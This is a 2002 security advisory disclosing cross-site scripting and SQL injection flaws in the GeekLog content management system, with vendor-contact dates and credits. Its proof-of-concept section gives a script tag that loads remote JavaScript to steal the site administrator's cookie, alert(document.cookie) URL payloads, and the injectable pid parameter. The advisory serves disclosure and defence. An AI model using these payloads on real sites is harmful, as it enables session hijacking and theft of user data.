+/--------\-------- ALPER Research Labs ------/--------/+ +/---------\------- Security Advisory -----/---------/+ +/----------\------ ID: ARL02-A13 ----/----------/+ +/-----------\----- salper@olympos.org ---/-----------/+ Advisory Information -------------------- Name : Multiple Security Issues in GeekLog Software Package : GeekLog Vendor Homepage : http://geeklog.sourceforge.net/ Vulnerable Versions: v1.3.5, v1.3.5rc1 and older Platforms : OS Independent, PHP Vulnerability Type : Input Validation Error Vendor Contacted : 31/05/2002 Vendor Replied : 01/06/2002 Prior Problems : N/A Current Version : v1.3.5rc1 (vulnerable) Summary ------- GeekLog is a web content management system suitable for running full-featured community sites. It supports article posting, threaded comments, event scheduling, and link management and is built around a design philosophy that emphasizes ease of use. I have found these issues while testing the GeekLog system which was to be used at http://www.olympos.org, "Olympos Turkish Security Portal". 2 different types of Cross Site Scripting issues, plus 1 SQL Injection vulnerability was found in GeekLog. Details ------- 1. When any user sends a new Calender Event, the form is submitted to the site admin for approval. The $url variable, which holds the data given in the "Link" section of the form, is not filtered for malicious code. So a malicious user may get the cookie of the site administrator and therefore "own" the site. Also this issue may be exploited to run malicious code on the GeekLog site. Proof-of-concept Link input ($url): <script src="http://forum.olympos.org/f.js";>Alper</script> 2. Maliciously crafted links from third party sites may allow Cross Site Scripting attacks via "index.php" and/or "comment.php". Two examples for this; /index.php?topic=<script>alert(document.cookie)</script> /comment.php?mode=display&sid=foo&pid=18&title=<script>alert (document.cookie)</script>&type=article 3. The $pid variable is directly passed to SQL input. This makes it possible for attackers to launch SQL injection attacks. /comment.php? mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs As the "Magic Quotes" function of PHP escapes the quoting characters, this third issue might just cause "light" headaches, but if the "Magic Quotes" is not active, the attacker may be able to get all the information about users from the SQL tables. Solution -------- The vendor replied and acted quickly. A patch or a new version pointing this issue will soon be available via CVS or a FTP download from: http://www.sourceforge.net/projects/geeklog or http://geeklog.sourceforge.net The development team of GeekLog said that; they will be cleaning out the code for similar security issues, which were mentioned above. Credits ------- Discovered on 31, May, 2002 by Ahmet Sabri ALPER <salper@olympos.org> ALPER Research Labs. The ALPER Research Labs. [ARL] workers are freelancer security professionals and WhiteHat hackers. The ARL workers are available for hiring for legal jobs. The ARL also supports Open Software Community, by detecting possible security issues in GPL or any other Public Licensed product. References ---------- Product Web Page: http://geeklog.sourceforge.net/ Olympos: http://www.olympos.org/
